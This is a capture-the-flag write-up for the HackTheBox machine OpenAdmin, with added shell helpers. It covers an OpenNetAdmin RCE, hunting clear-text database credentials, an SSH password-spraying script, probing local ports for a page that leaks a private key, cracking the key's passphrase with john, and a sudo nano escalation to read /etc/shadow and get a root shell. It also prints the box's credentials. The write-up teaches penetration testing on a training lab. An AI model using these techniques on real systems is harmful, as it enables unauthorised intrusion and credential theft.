Again, we start with nmap -sC -sV -oA ./OpenAdmin 10.10.10.171 (default scripts, version detection, all output formats saved under ./OpenAdmin).
SSH and Apache are running on their usual ports (22 and 80). Apache just serves the default page, so let's see what directories are there. The full Gobuster output is in the CTB if you want all of it, but the ones we care about are artwork, music, ona and sierra, the important one being "ona". Navigating to http://10.10.10.171/ona brings up an older version of OpenNetAdmin (the "Login" link on the music page leads to the same place). A quick Google search turns up an RCE for that version on Exploit-DB.
Running this gets us an ugly shell: every command is executed in a fresh process on the target, so we can't upgrade to a tty and cd doesn't stick from one command to the next. A little bit of trial and error through the application's config files and I found the database settings, with a nice clear-text password. #stopcodingcleartextpasswords
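Since the exploit shell forgets its working directory after every command, the practical workaround is to prefix each command with the cd it needs and to grep for credentials instead of cat-ing files one by one. The block below is an added example, not part of the original post or of the exploit: stateless_exec stands in for the exploit's command runner (in the real thing it is an HTTP request that returns the output), and the web root, config file name and password value are all constructed placeholders.

```shell
# Added example, not from the original post. stateless_exec simulates the
# exploit's behaviour of running each command in a fresh process (assumption:
# the real runner is an HTTP request returning the command's output).
stateless_exec() {
    sh -c "$1"
}

# Run a command "inside" a directory despite the stateless runner by
# prefixing the cd on every call.
in_dir() {
    dir="$1"; shift
    stateless_exec "cd '$dir' && $*"
}

# Constructed web root with a config file holding a clear-text DB password.
# The file name and the password value are placeholders, not the box's.
WEBROOT=$(mktemp -d)
mkdir -p "$WEBROOT/local/config"
cat > "$WEBROOT/local/config/db.inc.php" <<'EOF'
<?php
$db_config = array(
  'db_host'   => 'localhost',
  'db_login'  => 'app_user',
  'db_passwd' => 'example_only_not_real',
);
EOF

# Hunt for password-looking settings in PHP/include files under a directory;
# prints file:line:content. '|| true' keeps an empty result from being an error.
find_cleartext_creds() {
    in_dir "$1" "grep -rniE '(passw|pwd|secret)' --include='*.php' --include='*.inc' . || true"
}

# Number of hits, so the result is checkable rather than only printed.
cred_hits() {
    find_cleartext_creds "$1" | wc -l | tr -d ' '
}

find_cleartext_creds "$WEBROOT"
echo "cwd via in_dir: $(in_dir "$WEBROOT" pwd)"
```

On the real target you would replace stateless_exec with whatever the exploit script uses to send a command, and point find_cleartext_creds at the application's install directory.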
So we have:
One other good thing is that we can cat /etc/passwd to get the usernames. Filtering for accounts with a real login shell (ignoring the nologin and false entries) shows that, apart from root, there are really only two users.
So, let's try to SSH as jimmy and joanna with that n1nj4W4rri0R! password.....and jimmy's the big winner (or loser for reusing passwords, but I'll leave that decision up to you). Move LinEnum over to /tmp and run it. As always, its output is inside the CTB file listed above.
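The two steps above (pull the login-capable users out of /etc/passwd, then try the reused database password against each of them over SSH) as an added shell example, not code from the original post. The passwd content is constructed for the demo; spray_password needs sshpass on the attacking box and is only shown as a commented usage line, since it talks to the target.

```shell
# Added example, not from the original post. Extract accounts with a real
# login shell from a passwd file, then spray one password over them via SSH.

# Field 7 of /etc/passwd is the login shell; keep entries ending in "sh"
# (bash, sh, zsh, dash, ...), which drops nologin and false.
login_users() {
    awk -F: '$7 ~ /sh$/ { print $1 }' "$1"
}

# Constructed sample, not the real /etc/passwd from the box.
PASSWD_SAMPLE=$(mktemp)
cat > "$PASSWD_SAMPLE" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
joanna:x:1001:1001::/home/joanna:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
EOF

# Try one password against every login user; prints the ones that worked.
# Assumes sshpass is installed; the -o options keep ssh non-interactive.
spray_password() {
    host="$1"; password="$2"; passwd_file="$3"
    login_users "$passwd_file" | while read -r user; do
        if sshpass -p "$password" ssh -o StrictHostKeyChecking=no \
               -o PubkeyAuthentication=no -o ConnectTimeout=5 \
               "$user@$host" true 2>/dev/null; then
            echo "VALID: $user"
        fi
    done
}

login_users "$PASSWD_SAMPLE"
# spray_password 10.10.10.171 'n1nj4W4rri0R!' "$PASSWD_SAMPLE"   # run from the attack box
```

PubkeyAuthentication=no matters here: without it ssh may offer your own keys first and the password attempt never happens.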
Digging through the LinEnum output, we see that ol' Jimmy owns and has write access to the /var/www/internal folder, and there is a main.php file in there with some interesting content.
For some reason, main.php reads Joanna's SSH private key and prints it, so if we can reach that page we get her key. Trying to curl it straight from where we are using:
fails AT PORT 80! /var/www/internal is not what Apache serves on port 80, so it must be served by another vhost on a different port. Let's see what else is listening locally (ss -tlnp or netstat -tlnp will show it) using:
If we go through each port, we find that 52846 is the winner of that famous chicken dinner and we have Joanna's private key. Create a joanna.key file with that key in it, chmod 600 it (ssh refuses a key that others can read), and we're off to the next race.
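Going through each port by hand is tedious, so here is the port-hunting step as an added shell example (not from the original post): parse the listening ports out of ss -tln output, then curl each one on localhost for the page that leaks the key. The ss output below is constructed for the demo, and it is an assumption that main.php sits at the root of the internal vhost; probe_for_key is meant to run on the target itself, so it is left as a commented usage line.

```shell
# Added example, not from the original post. Enumerate listening TCP ports
# and probe each for the page that prints the SSH key.

# Extract unique listening ports from `ss -tln` output: field 4 is
# "Local Address:Port", and the port is whatever follows the last colon,
# which handles 0.0.0.0:22, [::]:22, *:80 and 127.0.0.53%lo:53 alike.
listening_ports() {
    awk 'NR > 1 { n = split($4, a, ":"); print a[n] }' "$1" | sort -un
}

# Constructed sample of `ss -tln` output, not captured from the box.
SS_SAMPLE=$(mktemp)
cat > "$SS_SAMPLE" <<'EOF'
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port
LISTEN  0       128     127.0.0.53%lo:53     0.0.0.0:*
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*
LISTEN  0       80      127.0.0.1:3306       0.0.0.0:*
LISTEN  0       128     127.0.0.1:52846      0.0.0.0:*
LISTEN  0       128     [::]:22              [::]:*
LISTEN  0       128     *:80                 *:*
EOF

# From the target, curl every listening port for the internal page and report
# the ones whose response contains a private key. Assumes main.php is at the
# vhost root. -m 3 keeps non-HTTP ports (ssh, mysql) from hanging the loop.
probe_for_key() {
    ports_file="$1"
    for p in $(listening_ports "$ports_file"); do
        if curl -s -m 3 "http://127.0.0.1:$p/main.php" 2>/dev/null | grep -q 'PRIVATE KEY'; then
            echo "key served on port $p"
        fi
    done
}

listening_ports "$SS_SAMPLE"
# On the target:  ss -tln > /tmp/ss.txt && probe_for_key /tmp/ss.txt
```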
Aaaand roadblock. I should have paid attention to the last lines of main.php: "Don't forget your 'ninja' password". There's a passphrase on the key. Time for John to come off the bench: ssh2john turns the key into a hash that john can run rockyou against. Also, this is the first box since I blew my Kali instance away, so I forgot to gunzip rockyou.txt.... oops.
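The passphrase step, as an added shell example that is not from the original post: check whether a recovered key is actually encrypted before reaching for john, crack it with ssh2john and rockyou (unzipping the wordlist first, which is exactly what tripped me up), and confirm the candidate passphrase offline with ssh-keygen before touching the target. The key file below is a constructed header-only stand-in, not a real key; the Kali wordlist path and the ssh2john name are assumptions about the attacking box.

```shell
# Added example, not from the original post. Detect, crack and verify a
# passphrase-protected SSH private key.

# Constructed stand-in for an encrypted legacy PEM key (not a real key).
KEY_SAMPLE=$(mktemp)
cat > "$KEY_SAMPLE" <<'EOF'
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,00000000000000000000000000000000

AAAAexamplebase64blobnotarealkey
-----END RSA PRIVATE KEY-----
EOF

# Constructed stand-in for an unencrypted legacy PEM key (not a real key).
KEY_PLAIN=$(mktemp)
cat > "$KEY_PLAIN" <<'EOF'
-----BEGIN RSA PRIVATE KEY-----
AAAAexamplebase64blobnotarealkey
-----END RSA PRIVATE KEY-----
EOF

# Returns 0 if the key is passphrase-protected. Legacy PEM keys announce it in
# the header; newer OpenSSH-format keys carry the cipher/KDF names inside the
# base64 blob ("none" when unencrypted).
key_is_encrypted() {
    if grep -q '^Proc-Type: 4,ENCRYPTED' "$1"; then
        return 0
    fi
    if grep -q 'BEGIN OPENSSH PRIVATE KEY' "$1" && \
       sed '/^-----/d' "$1" | base64 -d 2>/dev/null | grep -qaE 'aes256-ctr|bcrypt'; then
        return 0
    fi
    return 1
}

# Crack the passphrase with john. Assumes ssh2john (or /usr/share/john/ssh2john.py)
# and john are installed and rockyou lives in the usual Kali location.
crack_passphrase() {
    key="$1"
    [ -f /usr/share/wordlists/rockyou.txt ] || gunzip -k /usr/share/wordlists/rockyou.txt.gz
    ssh2john "$key" > "$key.hash"
    john --wordlist=/usr/share/wordlists/rockyou.txt "$key.hash"
    john --show "$key.hash"
}

# Verify a candidate passphrase offline: ssh-keygen -y only prints the public
# key if the private key decrypts with the supplied passphrase.
passphrase_works() {
    ssh-keygen -y -P "$2" -f "$1" >/dev/null 2>&1
}

if key_is_encrypted "$KEY_SAMPLE"; then echo "key is passphrase-protected"; fi
# crack_passphrase joanna.key
# passphrase_works joanna.key bloodninjas && echo "passphrase ok"
```

The verify step is worth the extra second: if john's candidate does not open the key locally, you have a wordlist or hash-extraction problem, not an SSH problem, and you avoid hammering the target's auth log while finding that out.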
Now we can ssh -i joanna.key joanna@10.10.10.171 with the passphrase 'bloodninjas'. For an easy box to have foothold > pivot > pivot > root is rare. Either cherish it or cuss at it. Your choice. From here, though, we can get the user and root flags. Using sudo -l we see that joanna can only run /bin/nano on the /opt/priv file (as root). Not much help until you think about the fact that nano lets you read another file INTO the one you're editing, and since nano is running as root, that other file can be anything root can read.
CTRL+R and we can read just about anything. Want the /etc/shadow file? Sure! (You'll need that with the new HTB flag rotation policy.) Want the root flag? DONE. And nano can do more than read: CTRL+R followed by CTRL+X runs a command instead of opening a file, so the same sudo rule hands you a root shell rather than just root's files.